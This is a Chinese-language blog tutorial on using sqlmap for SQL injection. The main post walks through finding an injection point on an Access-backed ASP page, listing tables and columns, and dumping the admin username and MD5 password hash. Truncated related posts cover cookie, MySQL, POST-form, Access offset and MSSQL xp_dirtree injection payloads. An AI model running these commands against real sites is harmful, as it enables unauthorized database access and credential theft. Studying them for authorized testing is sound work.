1.sqlmap学习笔记之Access注入

使用sqlmap工具进行Acces注入：
1.判断一个url是否存在注入点,根据返回数据判断数据库类型:

  .sqlmap.py -u "http://abcd****efg.asp?id=7"

假设返回内容如下：

   -------------------------

   [INFO] resuming back-end DBMS ‘microsoft access‘

   -------------------------

2.猜数据库表，输入：

 .sqlmap.py -u "http://abcd****efg.asp?id=7" --tables

3.输入线程：10，回车后开始跑表，找到合适的表后，按下ctrl+c终止跑表。

假设找到这几个表：admin mark province vote

-------------------------------------------
[ 4 tables]

+----------------------+

       admin
       mark
       province
       vote

+----------------------+

4.对admin表的字段进行猜解：

   .sqlmap.py -u "http://abcd****efg.asp?id=7" --tables --columns -T admin

假设找到admin表的字段如下： id username password

---------------------------------

  [INFO] retrieved:       id
  [INFO] retrieved:       username
  [INFO] retrieved:       password

----------------------------------

5.对字段内容进行猜解：

   .sqlmap.py -u "http://abcd****efg.asp?id=7" --dump -T admin -C "username,password"

获取结果假设为：

+---------------------------------+
  username  |   admin
+---------------------------------+
  password  | 21232f297a57a5a743894a0e4a801fc3  (32位MD5加密密文)
+---------------------------------+

账号:admin 密码：将密文解密即可。

时间： 2024-10-21 22:30:05

1.sqlmap学习笔记之Access注入的相关文章

3.sqlmap学习笔记之Cookie注入

Cookie注入: 1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.2.sqlmap命令提示符下输入下列内容进行跑表. sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2 假设返回内容如下,说明是access数据库. ------------------------- [INFO] resuming ba

2.sqlmap学习笔记之MySQL注入

1.判断一个url是否存在注入点: .sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs 假设找到数据库:student ------------------------------ available databases[1] [*] student ------------------------------ 2.获取数据库中的表名: .sqlmap.py -u "http://abcd****efg.asp?id=7"

渗透学习笔记之access偏移注入

access偏移注入是解决一些注入出不来列名或者时的情况,同时要求支持union select ,列名也必须足够多,知道表名 access注入语句: 1 Order by * 2 a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id) 这句话就是说把admin表记为a,同时也记为b,然后查询条件是a表的id列与b表的id列相等,返回所有相等的行,显然,a,b都是同一个表,当然全部返回啦.不理解的查一查语法吧. 3 *代

4.羽翼sqlmap学习笔记之Post登录框注入

4.Sqlmap系列教程——post登录框注入注入点: http://xxx.xxx.com/Login.asp 注入方式一: 1.对着注入点使用burp抓包,保存txt格式文件. 2.输入命令: ./sqlmap.py -r search-test.txt -p tfUPass 注入方式二:自动搜索表单的方式 sqlmap -u http://xxx.xxx.com/Login.asp --forms 注入方式三:指定一个参数的方法 sqlmap -u http://xxx.xxx.com/L

【安全牛学习笔记】SQLMAP- 自动注入

SQLMAP自动注入开源sql注入漏洞检测.利用工具检测动态页面中get/post参数.cookie.http头数据榨取文件系统访问操作系统命令执行引擎强大.特性丰富 Xss漏洞检测 ------------------------------------------------------------------------------ 低安全代码 <?php if (isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id

AngularJS学习笔记之依赖注入

最近在看AngularJS权威指南,由于各种各样的原因(主要是因为我没有money,好讨厌的有木有......),于是我选择了网上下载电子版的(因为它不要钱,哈哈...),字体也蛮清晰的,总体效果还不错.但是,当我看到左上角的总页码的时候,479页....479....479....俺的小心脏被击穿了二分之一有木有啊,上半身都石化了有木有啊,那种特别想学但是看到页码又不想学的纠结的心情比和女朋友吵架了还复杂有木有啊,我平常看的电子书百位数都不大于3的好伐! 哎,原谅我吧,我应该多看几本新华字典习

学习笔记六-Oracle注入和pstsgres注入

1,数据库介绍大型的数据库,甲骨文公司开发,政府,金融,证券等,安全要求高特点:支持多用户,大事务,安全和完整性教好,支持多分布式数控管理,移植性强 2,数据库的代码分析程序员对用户输入的特殊字符没有过滤导致的漏洞 3,注入原理两种方法,首先判是否有注入第一种,字段长度判断(藏锋者的书<<黑客web脚本攻击与防御技术核心剖析>> order by 3 union select 'null' .null,null from admin挨个尝试加单引号尝试第二种,order

Spring.Net学习笔记五(依赖注入)

谈到高级语言编程,我们就会联想到设计模式:谈到设计模式,我们就会说道怎么样解耦合.而Spring.NET的IoC容器其中的一种用途就是解耦合,其最经典的应用就是:依赖注入(Dependeny Injection)简称DI,目前DI是最优秀的解耦方式之一.下面我就来谈谈依赖注入的应用场景. 我模拟了三种不同的场景,可以一起学习使用依赖注入的重要性. 下面是应用场景的条件:人类使用工具劳动. /**//// <summary> /// 抽象人类 /// </summary>

【安全牛学习笔记】MSsqlL注入取得网站路径最好的方法

exec master..xp_dirtree'd:/test' 假设我们在test里有两个文件夹test1和test2在test1里又有test3结果显示subdirectory depthtest1 1test3 2test2 1哈哈发现没有那个depth就是目录的级数ok了,知道怎么办了吧http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--http://www.xxxx